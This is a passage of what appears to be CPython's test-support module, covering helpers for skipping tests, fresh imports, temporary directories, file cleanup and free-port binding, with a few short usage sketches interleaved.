"transient_internet", "BasicTestRunner", "run_unittest", "run_doctest",
"skip_unless_symlink", "requires_gzip", "requires_bz2", "requires_lzma",
"bigmemtest", "bigaddrspacetest", "cpython_only", "get_attribute",
"requires_IEEE_754", "skip_unless_xattr", "requires_zlib",
"anticipate_failure", "load_package_tests", "detect_api_mismatch",
"check__all__", "skip_unless_bind_unix_socket",
"ignore_warnings",
# sys
"is_jython", "is_android", "check_impl_detail", "unix_shell",
"setswitchinterval",
# network
"HOST", "IPV6_ENABLED", "find_unused_port", "bind_port", "open_urlresource",
"bind_unix_socket",
# processes
'temp_umask', "reap_children",
# logging
"TestHandler",
# threads
"threading_setup", "threading_cleanup", "reap_threads", "start_threads",
# miscellaneous
"check_warnings", "check_no_resource_warning", "check_no_warnings",
"EnvironmentVarGuard",
"run_with_locale", "swap_item",
"swap_attr", "Matcher", "set_memlimit", "SuppressCrashReport", "sortdict",
"run_with_tz", "PGO", "missing_compiler_executable", "fd_count",
]
class Error(Exception):
"""Base class for regression test exceptions."""
class TestFailed(Error):
"""Test failed."""
class ResourceDenied(unittest.SkipTest):
"""Test skipped because it requested a disallowed resource.
This is raised when a test calls requires() for a resource that
has not been enabled. It is used to distinguish between expected
and unexpected skips.
"""
@contextlib.contextmanager
def _ignore_deprecated_imports(ignore=True):
"""Context manager to suppress package and module deprecation
warnings when importing them.
If ignore is False, this context manager has no effect.
"""
if ignore:
with warnings.catch_warnings():
warnings.filterwarnings("ignore", ".+ (module|package)",
DeprecationWarning)
yield
else:
yield
def ignore_warnings(*, category):
"""Decorator to suppress deprecation warnings.
Use of context managers to hide warnings makes diffs
more noisy and tools like 'git blame' less useful.
"""
def decorator(test):
@functools.wraps(test)
def wrapper(self, *args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter('ignore', category=category)
return test(self, *args, **kwargs)
return wrapper
return decorator
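# Editor's note: a hypothetical usage sketch for ignore_warnings(); the test
# class and the deprecated call are invented for illustration only:
#
#     class ExampleTests(unittest.TestCase):
#         @ignore_warnings(category=DeprecationWarning)
#         def test_uses_deprecated_api(self):
#             warnings.warn("old API", DeprecationWarning)  # suppressed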
def import_module(name, deprecated=False, *, required_on=()):
"""Import and return the module to be tested, raising SkipTest if
it is not available.
If deprecated is True, any module or package deprecation messages
will be suppressed. If a module is required on a platform but optional for
others, set required_on to an iterable of platform prefixes which will be
compared against sys.platform.
"""
with _ignore_deprecated_imports(deprecated):
try:
return importlib.import_module(name)
except ImportError as msg:
if sys.platform.startswith(tuple(required_on)):
raise
raise unittest.SkipTest(str(msg))
def _save_and_remove_module(name, orig_modules):
"""Helper function to save and remove a module from sys.modules
Raise ImportError if the module can't be imported.
"""
# try to import the module and raise an error if it can't be imported
if name not in sys.modules:
__import__(name)
del sys.modules[name]
for modname in list(sys.modules):
if modname == name or modname.startswith(name + '.'):
orig_modules[modname] = sys.modules[modname]
del sys.modules[modname]
def _save_and_block_module(name, orig_modules):
"""Helper function to save and block a module in sys.modules
Return True if the module was in sys.modules, False otherwise.
"""
saved = True
try:
orig_modules[name] = sys.modules[name]
except KeyError:
saved = False
sys.modules[name] = None
return saved
def anticipate_failure(condition):
"""Decorator to mark a test that is known to be broken in some cases
Any use of this decorator should have a comment identifying the
associated tracker issue.
"""
if condition:
return unittest.expectedFailure
return lambda f: f
def load_package_tests(pkg_dir, loader, standard_tests, pattern):
"""Generic load_tests implementation for simple test packages.
Most packages can implement load_tests using this function as follows:
def load_tests(*args):
return load_package_tests(os.path.dirname(__file__), *args)
"""
if pattern is None:
pattern = "test*"
top_dir = os.path.dirname( # Lib
os.path.dirname( # test
os.path.dirname(__file__))) # support
package_tests = loader.discover(start_dir=pkg_dir,
top_level_dir=top_dir,
pattern=pattern)
standard_tests.addTests(package_tests)
return standard_tests
def import_fresh_module(name, fresh=(), blocked=(), deprecated=False):
"""Import and return a module, deliberately bypassing sys.modules.
This function imports and returns a fresh copy of the named Python module
by removing the named module from sys.modules before doing the import.
Note that unlike reload, the original module is not affected by
this operation.
*fresh* is an iterable of additional module names that are also removed
from the sys.modules cache before doing the import.
*blocked* is an iterable of module names that are replaced with None
in the module cache during the import to ensure that attempts to import
them raise ImportError.
The named module and any modules named in the *fresh* and *blocked*
parameters are saved before starting the import and then reinserted into
sys.modules when the fresh import is complete.
Module and package deprecation messages are suppressed during this import
if *deprecated* is True.
This function will raise ImportError if the named module cannot be
imported.
"""
# NOTE: test_heapq, test_json and test_warnings include extra sanity checks
# to make sure that this utility function is working as expected
with _ignore_deprecated_imports(deprecated):
# Keep track of modules saved for later restoration as well
# as those which just need a blocking entry removed
orig_modules = {}
names_to_remove = []
_save_and_remove_module(name, orig_modules)
try:
for fresh_name in fresh:
_save_and_remove_module(fresh_name, orig_modules)
for blocked_name in blocked:
if not _save_and_block_module(blocked_name, orig_modules):
names_to_remove.append(blocked_name)
fresh_module = importlib.import_module(name)
except ImportError:
fresh_module = None
finally:
for orig_name, module in orig_modules.items():
sys.modules[orig_name] = module
for name_to_remove in names_to_remove:
del sys.modules[name_to_remove]
return fresh_module
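# Editor's note: a hedged usage sketch of import_fresh_module(), mirroring the
# pattern used by tests such as test_heapq -- import the pure-Python module
# with its C accelerator blocked so both implementations can be exercised:
#
#     py_heapq = import_fresh_module('heapq', blocked=['_heapq'])
#     c_heapq = import_fresh_module('heapq', fresh=['_heapq'])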
def get_attribute(obj, name):
"""Get an attribute, raising SkipTest if AttributeError is raised."""
try:
attribute = getattr(obj, name)
except AttributeError:
raise unittest.SkipTest("object %r has no attribute %r" % (obj, name))
else:
return attribute
verbose = 1 # Flag set to 0 by regrtest.py
use_resources = None # Flag set to [] by regrtest.py
max_memuse = 0 # Disable bigmem tests (they will still be run with
# small sizes, to make sure they work.)
real_max_memuse = 0
junit_xml_list = None # list of testsuite XML elements
failfast = False
# _original_stdout is meant to hold stdout at the time regrtest began.
# This may be "the real" stdout, or IDLE's emulation of stdout, or whatever.
# The point is to have some flavor of stdout the user can actually see.
_original_stdout = None
def record_original_stdout(stdout):
global _original_stdout
_original_stdout = stdout
def get_original_stdout():
return _original_stdout or sys.stdout
def unload(name):
try:
del sys.modules[name]
except KeyError:
pass
def _force_run(path, func, *args):
try:
return func(*args)
except OSError as err:
if verbose >= 2:
print('%s: %s' % (err.__class__.__name__, err))
print('re-run %s%r' % (func.__name__, args))
os.chmod(path, stat.S_IRWXU)
return func(*args)
if sys.platform.startswith("win"):
def _waitfor(func, pathname, waitall=False):
# Perform the operation
func(pathname)
# Now setup the wait loop
if waitall:
dirname = pathname
else:
dirname, name = os.path.split(pathname)
dirname = dirname or '.'
# Check for `pathname` to be removed from the filesystem.
# The exponential backoff of the timeout amounts to a total
# of ~1 second after which the deletion is probably an error
# anyway.
# Testing on an [email protected] shows that usually only 1 iteration is
# required when contention occurs.
timeout = 0.001
while timeout < 1.0:
# Note we are only testing for the existence of the file(s) in
# the contents of the directory regardless of any security or
# access rights. If we have made it this far, we have sufficient
# permissions to do that much using Python's equivalent of the
# Windows API FindFirstFile.
# Other Windows APIs can fail or give incorrect results when
# dealing with files that are pending deletion.
L = os.listdir(dirname)
if not (L if waitall else name in L):
return
# Increase the timeout and try again
time.sleep(timeout)
timeout *= 2
warnings.warn('tests may fail, delete still pending for ' + pathname,
RuntimeWarning, stacklevel=4)
def _unlink(filename):
_waitfor(os.unlink, filename)
def _rmdir(dirname):
_waitfor(os.rmdir, dirname)
def _rmtree(path):
def _rmtree_inner(path):
for name in _force_run(path, os.listdir, path):
fullname = os.path.join(path, name)
try:
mode = os.lstat(fullname).st_mode
except OSError as exc:
print("support.rmtree(): os.lstat(%r) failed with %s" % (fullname, exc),
file=sys.__stderr__)
mode = 0
if stat.S_ISDIR(mode):
_waitfor(_rmtree_inner, fullname, waitall=True)
_force_run(fullname, os.rmdir, fullname)
else:
_force_run(fullname, os.unlink, fullname)
_waitfor(_rmtree_inner, path, waitall=True)
_waitfor(lambda p: _force_run(p, os.rmdir, p), path)
def _longpath(path):
try:
import ctypes
except ImportError:
# No ctypes means we can't expand paths.
pass
else:
buffer = ctypes.create_unicode_buffer(len(path) * 2)
length = ctypes.windll.kernel32.GetLongPathNameW(path, buffer,
len(buffer))
if length:
return buffer[:length]
return path
else:
_unlink = os.unlink
_rmdir = os.rmdir
def _rmtree(path):
try:
shutil.rmtree(path)
return
except OSError:
pass
def _rmtree_inner(path):
for name in _force_run(path, os.listdir, path):
fullname = os.path.join(path, name)
try:
mode = os.lstat(fullname).st_mode
except OSError:
mode = 0
if stat.S_ISDIR(mode):
_rmtree_inner(fullname)
_force_run(path, os.rmdir, fullname)
else:
_force_run(path, os.unlink, fullname)
_rmtree_inner(path)
os.rmdir(path)
def _longpath(path):
return path
def unlink(filename):
try:
_unlink(filename)
except (FileNotFoundError, NotADirectoryError):
pass
def rmdir(dirname):
try:
_rmdir(dirname)
except FileNotFoundError:
pass
def rmtree(path):
try:
_rmtree(path)
except FileNotFoundError:
pass
def make_legacy_pyc(source):
"""Move a PEP 3147/488 pyc file to its legacy pyc location.
:param source: The file system path to the source file. The source file
does not need to exist, however the PEP 3147/488 pyc file must exist.
:return: The file system path to the legacy pyc file.
"""
pyc_file = importlib.util.cache_from_source(source)
up_one = os.path.dirname(os.path.abspath(source))
legacy_pyc = os.path.join(up_one, source + 'c')
os.rename(pyc_file, legacy_pyc)
return legacy_pyc
def forget(modname):
"""'Forget' a module was ever imported.
This removes the module from sys.modules and deletes any PEP 3147/488 or
legacy .pyc files.
"""
unload(modname)
for dirname in sys.path:
source = os.path.join(dirname, modname + '.py')
# It doesn't matter if they exist or not, unlink all possible
# combinations of PEP 3147/488 and legacy pyc files.
unlink(source + 'c')
for opt in ('', 1, 2):
unlink(importlib.util.cache_from_source(source, optimization=opt))
# Check whether a gui is actually available
def _is_gui_available():
if hasattr(_is_gui_available, 'result'):
return _is_gui_available.result
reason = None
if sys.platform.startswith('win'):
# if Python is running as a service (such as the buildbot service),
# gui interaction may be disallowed
import ctypes
import ctypes.wintypes
UOI_FLAGS = 1
WSF_VISIBLE = 0x0001
class USEROBJECTFLAGS(ctypes.Structure):
_fields_ = [("fInherit", ctypes.wintypes.BOOL),
("fReserved", ctypes.wintypes.BOOL),
("dwFlags", ctypes.wintypes.DWORD)]
dll = ctypes.windll.user32
h = dll.GetProcessWindowStation()
if not h:
raise ctypes.WinError()
uof = USEROBJECTFLAGS()
needed = ctypes.wintypes.DWORD()
res = dll.GetUserObjectInformationW(h,
UOI_FLAGS,
ctypes.byref(uof),
ctypes.sizeof(uof),
ctypes.byref(needed))
if not res:
raise ctypes.WinError()
if not bool(uof.dwFlags & WSF_VISIBLE):
reason = "gui not available (WSF_VISIBLE flag not set)"
elif sys.platform == 'darwin':
# The Aqua Tk implementations on OS X can abort the process if
# being called in an environment where a window server connection
# cannot be made, for instance when invoked by a buildbot or ssh
# process not running under the same user id as the current console
# user. To avoid that, raise an exception if the window manager
# connection is not available.
from ctypes import cdll, c_int, pointer, Structure
from ctypes.util import find_library
app_services = cdll.LoadLibrary(find_library("ApplicationServices"))
if app_services.CGMainDisplayID() == 0:
reason = "gui tests cannot run without OS X window manager"
else:
class ProcessSerialNumber(Structure):
_fields_ = [("highLongOfPSN", c_int),
("lowLongOfPSN", c_int)]
psn = ProcessSerialNumber()
psn_p = pointer(psn)
if ( (app_services.GetCurrentProcess(psn_p) < 0) or
(app_services.SetFrontProcess(psn_p) < 0) ):
reason = "cannot run without OS X gui process"
# check on every platform whether tkinter can actually do anything
if not reason:
try:
from tkinter import Tk
root = Tk()
root.withdraw()
root.update()
root.destroy()
except Exception as e:
err_string = str(e)
if len(err_string) > 50:
err_string = err_string[:50] + ' [...]'
reason = 'Tk unavailable due to {}: {}'.format(type(e).__name__,
err_string)
_is_gui_available.reason = reason
_is_gui_available.result = not reason
return _is_gui_available.result
def is_resource_enabled(resource):
"""Test whether a resource is enabled.
Known resources are set by regrtest.py. If not running under regrtest.py,
all resources are assumed enabled unless use_resources has been set.
"""
return use_resources is None or resource in use_resources
def requires(resource, msg=None):
"""Raise ResourceDenied if the specified resource is not available."""
if not is_resource_enabled(resource):
if msg is None:
msg = "Use of the %r resource not enabled" % resource
raise ResourceDenied(msg)
if resource == 'gui' and not _is_gui_available():
raise ResourceDenied(_is_gui_available.reason)
def _requires_unix_version(sysname, min_version):
"""Decorator raising SkipTest if the OS is `sysname` and the version is less
than `min_version`.
For example, @_requires_unix_version('FreeBSD', (7, 2)) raises SkipTest if
the FreeBSD version is less than 7.2.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if platform.system() == sysname:
version_txt = platform.release().split('-', 1)[0]
try:
version = tuple(map(int, version_txt.split('.')))
except ValueError:
pass
else:
if version < min_version:
min_version_txt = '.'.join(map(str, min_version))
raise unittest.SkipTest(
"%s version %s or higher required, not %s"
% (sysname, min_version_txt, version_txt))
return func(*args, **kw)
wrapper.min_version = min_version
return wrapper
return decorator
def requires_freebsd_version(*min_version):
"""Decorator raising SkipTest if the OS is FreeBSD and the FreeBSD version is
less than `min_version`.
For example, @requires_freebsd_version(7, 2) raises SkipTest if the FreeBSD
version is less than 7.2.
"""
return _requires_unix_version('FreeBSD', min_version)
def requires_linux_version(*min_version):
"""Decorator raising SkipTest if the OS is Linux and the Linux version is
less than `min_version`.
For example, @requires_linux_version(2, 6, 32) raises SkipTest if the Linux
version is less than 2.6.32.
"""
return _requires_unix_version('Linux', min_version)
def requires_mac_ver(*min_version):
"""Decorator raising SkipTest if the OS is Mac OS X and the OS X
version is less than min_version.
For example, @requires_mac_ver(10, 5) raises SkipTest if the OS X version
is less than 10.5.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if sys.platform == 'darwin':
version_txt = platform.mac_ver()[0]
try:
version = tuple(map(int, version_txt.split('.')))
except ValueError:
pass
else:
if version < min_version:
min_version_txt = '.'.join(map(str, min_version))
raise unittest.SkipTest(
"Mac OS X %s or higher required, not %s"
% (min_version_txt, version_txt))
return func(*args, **kw)
wrapper.min_version = min_version
return wrapper
return decorator
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
def find_unused_port(family=socket.AF_INET, socktype=socket.SOCK_STREAM):
"""Returns an unused port that should be suitable for binding. This is
achieved by creating a temporary socket with the same family and type as
the 'sock' parameter (default is AF_INET, SOCK_STREAM), and binding it to
the specified host address (defaults to 0.0.0.0) with the port set to 0,
eliciting an unused ephemeral port from the OS. The temporary socket is
then closed and deleted, and the ephemeral port is returned.
Either this method or bind_port() should be used for any tests where a
server socket needs to be bound to a particular port for the duration of
the test. Which one to use depends on whether the calling code is creating
a python socket, or if an unused port needs to be provided in a constructor
or passed to an external program (i.e. the -accept argument to openssl's
s_server mode). Always prefer bind_port() over find_unused_port() where
possible. Hard coded ports should *NEVER* be used. As soon as a server
socket is bound to a hard coded port, the ability to run multiple instances
of the test simultaneously on the same host is compromised, which makes the
test a ticking time bomb in a buildbot environment. On Unix buildbots, this
may simply manifest as a failed test, which can be recovered from without
intervention in most cases, but on Windows, the entire python process can
completely and utterly wedge, requiring someone to log in to the buildbot
and manually kill the affected process.
(This is easy to reproduce on Windows, unfortunately, and can be traced to
the SO_REUSEADDR socket option having different semantics on Windows versus
Unix/Linux. On Unix, you can't have two AF_INET SOCK_STREAM sockets bind,
listen and then accept connections on identical host/ports. An EADDRINUSE
OSError will be raised at some point (depending on the platform and
the order bind and listen were called on each socket).
However, on Windows, if SO_REUSEADDR is set on the sockets, no EADDRINUSE
will ever be raised when attempting to bind two identical host/ports. When
accept() is called on each socket, the second caller's process will steal
the port from the first caller, leaving them both in an awkwardly wedged
state where they'll no longer respond to any signals or graceful kills, and
must be forcibly killed via OpenProcess()/TerminateProcess().
The solution on Windows is to use the SO_EXCLUSIVEADDRUSE socket option
instead of SO_REUSEADDR, which effectively affords the same semantics as
SO_REUSEADDR on Unix. Given the propensity of Unix developers in the Open
Source world compared to Windows ones, this is a common mistake. A quick
look over OpenSSL's 0.9.8g source shows that they use SO_REUSEADDR when
openssl.exe is called with the 's_server' option, for example. See
http://bugs.python.org/issue2550 for more info. The following site also
has a very thorough description about the implications of both REUSEADDR
and EXCLUSIVEADDRUSE on Windows:
http://msdn2.microsoft.com/en-us/library/ms740621(VS.85).aspx)
XXX: although this approach is a vast improvement on previous attempts to
elicit unused ports, it rests heavily on the assumption that the ephemeral
port returned to us by the OS won't immediately be dished back out to some
other process when we close and delete our temporary socket but before our
calling code has a chance to bind the returned port. We can deal with this
issue if/when we come across it.
"""
tempsock = socket.socket(family, socktype)
port = bind_port(tempsock)
tempsock.close()
del tempsock
return port
def bind_port(sock, host=HOST):
"""Bind the socket to a free port and return the port number. Relies on
ephemeral ports in order to ensure we are using an unbound port. This is
important as many tests may be running simultaneously, especially in a
buildbot environment. This method raises an exception if the sock.family
is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
or SO_REUSEPORT set on it. Tests should *never* set these socket options
for TCP/IP sockets. The only case for setting these options is testing
multicasting via multiple UDP sockets.
Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
on Windows), it will be set on the socket. This will prevent anyone else
from bind()'ing to our host/port for the duration of the test.
"""
if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
if hasattr(socket, 'SO_REUSEADDR'):
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
raise TestFailed("tests should never set the SO_REUSEADDR " \
"socket option on TCP/IP sockets!")
if hasattr(socket, 'SO_REUSEPORT'):
try:
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
raise TestFailed("tests should never set the SO_REUSEPORT " \
"socket option on TCP/IP sockets!")
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
pass
if hasattr(socket, 'SO_EXCLUSIVEADDRUSE'):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
return port
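# Editor's note: a hypothetical usage sketch for bind_port() inside a test;
# only the port-selection pattern is shown, the client side is omitted:
#
#     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     port = bind_port(sock)   # binds sock to (HOST, <free ephemeral port>)
#     sock.listen()
#     # ... connect a client to (HOST, port), run the test, then close sock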
def bind_unix_socket(sock, addr):
"""Bind a unix socket, raising SkipTest if PermissionError is raised."""
assert sock.family == socket.AF_UNIX
try:
sock.bind(addr)
except PermissionError:
sock.close()
raise unittest.SkipTest('cannot bind AF_UNIX sockets')
def _is_ipv6_enabled():
"""Check whether IPv6 is enabled on this host."""
if socket.has_ipv6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind((HOSTv6, 0))
return True
except OSError:
pass
finally:
if sock:
sock.close()
return False
IPV6_ENABLED = _is_ipv6_enabled()
def system_must_validate_cert(f):
"""Skip the test on TLS certificate validation failures."""
@functools.wraps(f)
def dec(*args, **kwargs):
try:
f(*args, **kwargs)
except OSError as e:
if "CERTIFICATE_VERIFY_FAILED" in str(e):
raise unittest.SkipTest("system does not contain "
"necessary certificates")
raise
return dec
# A constant likely larger than the underlying OS pipe buffer size, to
# make writes blocking.
# Windows limit seems to be around 512 B, and many Unix kernels have a
# 64 KiB pipe buffer size or 16 * PAGE_SIZE: take a few megs to be sure.
# (see issue #17835 for a discussion of this number).
PIPE_MAX_SIZE = 4 * 1024 * 1024 + 1
# A constant likely larger than the underlying OS socket buffer size, to make
# writes blocking.
# The socket buffer sizes can usually be tuned system-wide (e.g. through sysctl
# on Linux), or on a per-socket basis (SO_SNDBUF/SO_RCVBUF). See issue #18643
# for a discussion of this number).
SOCK_MAX_SIZE = 16 * 1024 * 1024 + 1
# decorator for skipping tests on non-IEEE 754 platforms
requires_IEEE_754 = unittest.skipUnless(
float.__getformat__("double").startswith("IEEE"),
"test requires IEEE 754 doubles")
requires_zlib = unittest.skipUnless(zlib, 'requires zlib')
requires_gzip = unittest.skipUnless(gzip, 'requires gzip')
requires_bz2 = unittest.skipUnless(bz2, 'requires bz2')
requires_lzma = unittest.skipUnless(lzma, 'requires lzma')
is_jython = sys.platform.startswith('java')
is_android = hasattr(sys, 'getandroidapilevel')
if sys.platform != 'win32':
unix_shell = '/system/bin/sh' if is_android else '/bin/sh'
else:
unix_shell = None
# Filename used for testing
if os.name == 'java':
# Jython disallows @ in module names
TESTFN = '$test'
else:
TESTFN = '@test'
# Disambiguate TESTFN for parallel testing, while letting it remain a valid
# module name.
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
# FS_NONASCII: non-ASCII character encodable by os.fsencode(),
# or None if there is no such character.
FS_NONASCII = None
for character in (
# First try printable and common characters to have a readable filename.
# For each character, the encoding list is just an example of encodings able
# to encode the character (the list is not exhaustive).
# U+00E6 (Latin Small Letter Ae): cp1252, iso-8859-1
'\u00E6',
# U+0130 (Latin Capital Letter I With Dot Above): cp1254, iso8859_3
'\u0130',
# U+0141 (Latin Capital Letter L With Stroke): cp1250, cp1257
'\u0141',
# U+03C6 (Greek Small Letter Phi): cp1253
'\u03C6',
# U+041A (Cyrillic Capital Letter Ka): cp1251
'\u041A',
# U+05D0 (Hebrew Letter Alef): Encodable to cp424
'\u05D0',
# U+060C (Arabic Comma): cp864, cp1006, iso8859_6, mac_arabic
'\u060C',
# U+062A (Arabic Letter Teh): cp720
'\u062A',
# U+0E01 (Thai Character Ko Kai): cp874
'\u0E01',
# Then try more "special" characters. "special" because they may be
# interpreted or displayed differently depending on the exact locale
# encoding and the font.
# U+00A0 (No-Break Space)
'\u00A0',
# U+20AC (Euro Sign)
'\u20AC',
):
try:
os.fsdecode(os.fsencode(character))
except UnicodeError:
pass
else:
FS_NONASCII = character
break
# TESTFN_UNICODE is a non-ascii filename
TESTFN_UNICODE = TESTFN + "-\xe0\xf2\u0258\u0141\u011f"
if sys.platform == 'darwin':
# In Mac OS X's VFS API file names are, by definition, canonically
# decomposed Unicode, encoded using UTF-8. See QA1173:
# http://developer.apple.com/mac/library/qa/qa2001/qa1173.html
import unicodedata
TESTFN_UNICODE = unicodedata.normalize('NFD', TESTFN_UNICODE)
TESTFN_ENCODING = sys.getfilesystemencoding()
# TESTFN_UNENCODABLE is a filename (str type) that should *not* be able to be
# encoded by the filesystem encoding (in strict mode). It can be None if we
# cannot generate such filename.
TESTFN_UNENCODABLE = None
if os.name == 'nt':
# skip win32s (0) or Windows 9x/ME (1)
if sys.getwindowsversion().platform >= 2:
# Different kinds of characters from various languages to minimize the
# probability that the whole name is encodable to MBCS (issue #9819)
TESTFN_UNENCODABLE = TESTFN + "-\u5171\u0141\u2661\u0363\uDC80"
try:
TESTFN_UNENCODABLE.encode(TESTFN_ENCODING)
except UnicodeEncodeError:
pass
else:
print('WARNING: The filename %r CAN be encoded by the filesystem encoding (%s). '
'Unicode filename tests may not be effective'
% (TESTFN_UNENCODABLE, TESTFN_ENCODING))
TESTFN_UNENCODABLE = None
# Mac OS X denies unencodable filenames (invalid utf-8)
elif sys.platform != 'darwin':
try:
# ascii and utf-8 cannot encode the byte 0xff
b'\xff'.decode(TESTFN_ENCODING)
except UnicodeDecodeError:
# 0xff will be encoded using the surrogate character u+DCFF
TESTFN_UNENCODABLE = TESTFN \
+ b'-\xff'.decode(TESTFN_ENCODING, 'surrogateescape')
else:
# File system encoding (eg. ISO-8859-* encodings) can encode
# the byte 0xff. Skip some unicode filename tests.
pass
# TESTFN_UNDECODABLE is a filename (bytes type) that should *not* be able to be
# decoded from the filesystem encoding (in strict mode). It can be None if we
# cannot generate such filename (ex: the latin1 encoding can decode any byte
# sequence). On UNIX, TESTFN_UNDECODABLE can be decoded by os.fsdecode() thanks
# to the surrogateescape error handler (PEP 383), but not from the filesystem
# encoding in strict mode.
TESTFN_UNDECODABLE = None
for name in (
# b'\xff' is not decodable by os.fsdecode() with code page 932. Windows
# accepts it when creating a file or a directory, but does not accept entering
# such a directory (when the bytes name is used). So test b'\xe7' first: it is
# not decodable from cp932.
b'\xe7w\xf0',
# undecodable from ASCII, UTF-8
b'\xff',
# undecodable from iso8859-3, iso8859-6, iso8859-7, cp424, iso8859-8, cp856
# and cp857
b'\xae\xd5'
# undecodable from UTF-8 (UNIX and Mac OS X)
b'\xed\xb2\x80', b'\xed\xb4\x80',
# undecodable from shift_jis, cp869, cp874, cp932, cp1250, cp1251, cp1252,
# cp1253, cp1254, cp1255, cp1257, cp1258
b'\x81\x98',
):
try:
name.decode(TESTFN_ENCODING)
except UnicodeDecodeError:
TESTFN_UNDECODABLE = os.fsencode(TESTFN) + name
break
if FS_NONASCII:
TESTFN_NONASCII = TESTFN + '-' + FS_NONASCII
else:
TESTFN_NONASCII = None
# Save the initial cwd
SAVEDCWD = os.getcwd()
# Set by libregrtest/main.py so we can skip tests that are not
# useful for PGO
PGO = False
@contextlib.contextmanager
def temp_dir(path=None, quiet=False):
"""Return a context manager that creates a temporary directory.
Arguments:
path: the directory to create temporarily. If omitted or None,
defaults to creating a temporary directory using tempfile.mkdtemp.
quiet: if False (the default), the context manager raises an exception
on error. Otherwise, if the path is specified and cannot be
created, only a warning is issued.
"""
dir_created = False
if path is None:
path = tempfile.mkdtemp()
dir_created = True
path = os.path.realpath(path)
else:
try:
os.mkdir(path)
dir_created = True
except OSError as exc:
if not quiet:
raise
warnings.warn(f'tests may fail, unable to create '
f'temporary directory {path!r}: {exc}',
RuntimeWarning, stacklevel=3)
if dir_created:
pid = os.getpid()
try:
yield path
finally:
# In case the process forks, let only the parent remove the
        # directory. The child has a different process id. (bpo-30028)
if dir_created and pid == os.getpid():
rmtree(path)
@contextlib.contextmanager
def change_cwd(path, quiet=False):
"""Return a context manager that changes the current working directory.
Arguments:
path: the directory to use as the temporary current working directory.
quiet: if False (the default), the context manager raises an exception
on error. Otherwise, it issues only a warning and keeps the current
working directory the same.
"""
saved_dir = os.getcwd()
try:
os.chdir(path)
except OSError as exc:
if not quiet:
raise
warnings.warn(f'tests may fail, unable to change the current working '
f'directory to {path!r}: {exc}',
RuntimeWarning, stacklevel=3)
try:
yield os.getcwd()
finally:
os.chdir(saved_dir)
@contextlib.contextmanager
def temp_cwd(name='tempcwd', quiet=False):
"""
Context manager that temporarily creates and changes the CWD.
The function temporarily changes the current working directory
after creating a temporary directory in the current directory with
name *name*. If *name* is None, the temporary directory is
created using tempfile.mkdtemp.
If *quiet* is False (default) and it is not possible to
create or change the CWD, an error is raised. If *quiet* is True,
only a warning is raised and the original CWD is used.
"""
with temp_dir(path=name, quiet=quiet) as temp_path:
with change_cwd(temp_path, quiet=quiet) as cwd_dir:
yield cwd_dir
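# Illustrative sketch (editor-added, not part of the original module): typical use of
# temp_cwd().  It assumes the helpers defined above and the module-level os import.
def _example_temp_cwd_usage():
    # Create ./example_scratch, chdir into it, and undo both on exit.
    with temp_cwd('example_scratch') as scratch:
        with open('note.txt', 'w', encoding='utf-8') as f:
            f.write('scratch data')
        assert os.path.basename(scratch) == 'example_scratch'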
if hasattr(os, "umask"):
@contextlib.contextmanager
def temp_umask(umask):
"""Context manager that temporarily sets the process umask."""
oldmask = os.umask(umask)
try:
yield
finally:
os.umask(oldmask)
# TEST_HOME_DIR refers to the top level directory of the "test" package
# that contains Python's regression test suite
TEST_SUPPORT_DIR = os.path.dirname(os.path.abspath(__file__))
TEST_HOME_DIR = os.path.dirname(TEST_SUPPORT_DIR)
# TEST_DATA_DIR is used as a target download location for remote resources
TEST_DATA_DIR = os.path.join(TEST_HOME_DIR, "data")
def findfile(filename, subdir=None):
"""Try to find a file on sys.path or in the test directory. If it is not
found the argument passed to the function is returned (this does not
necessarily signal failure; could still be the legitimate path).
Setting *subdir* indicates a relative path to use to find the file
rather than looking directly in the path directories.
"""
if os.path.isabs(filename):
return filename
if subdir is not None:
filename = os.path.join(subdir, filename)
path = [TEST_HOME_DIR] + sys.path
for dn in path:
fn = os.path.join(dn, filename)
if os.path.exists(fn): return fn
return filename
def create_empty_file(filename):
"""Create an empty file. If the file already exists, truncate it."""
fd = os.open(filename, os.O_WRONLY | os.O_CREAT | os.O_TRUNC)
os.close(fd)
def sortdict(dict):
"Like repr(dict), but in sorted order."
items = sorted(dict.items())
reprpairs = ["%r: %r" % pair for pair in items]
withcommas = ", ".join(reprpairs)
return "{%s}" % withcommas
def make_bad_fd():
"""
Create an invalid file descriptor by opening and closing a file and return
its fd.
"""
file = open(TESTFN, "wb")
try:
return file.fileno()
finally:
file.close()
unlink(TESTFN)
def check_syntax_error(testcase, statement, errtext='', *, lineno=None, offset=None):
with testcase.assertRaisesRegex(SyntaxError, errtext) as cm:
compile(statement, '<test string>', 'exec')
err = cm.exception
testcase.assertIsNotNone(err.lineno)
if lineno is not None:
testcase.assertEqual(err.lineno, lineno)
testcase.assertIsNotNone(err.offset)
if offset is not None:
testcase.assertEqual(err.offset, offset)
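# Illustrative sketch (editor-added): how a test case might call check_syntax_error().
# 'return' outside a function genuinely fails to compile, so the assertions pass.
class _ExampleSyntaxErrorTest(unittest.TestCase):
    def test_return_outside_function(self):
        check_syntax_error(self, 'return 42', 'outside function', lineno=1)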
def open_urlresource(url, *args, **kw):
import urllib.request, urllib.parse
check = kw.pop('check', None)
filename = urllib.parse.urlparse(url)[2].split('/')[-1] # '/': it's URL!
fn = os.path.join(TEST_DATA_DIR, filename)
def check_valid_file(fn):
f = open(fn, *args, **kw)
if check is None:
return f
elif check(f):
f.seek(0)
return f
f.close()
if os.path.exists(fn):
f = check_valid_file(fn)
if f is not None:
return f
unlink(fn)
# Verify the requirement before downloading the file
requires('urlfetch')
if verbose:
print('\tfetching %s ...' % url, file=get_original_stdout())
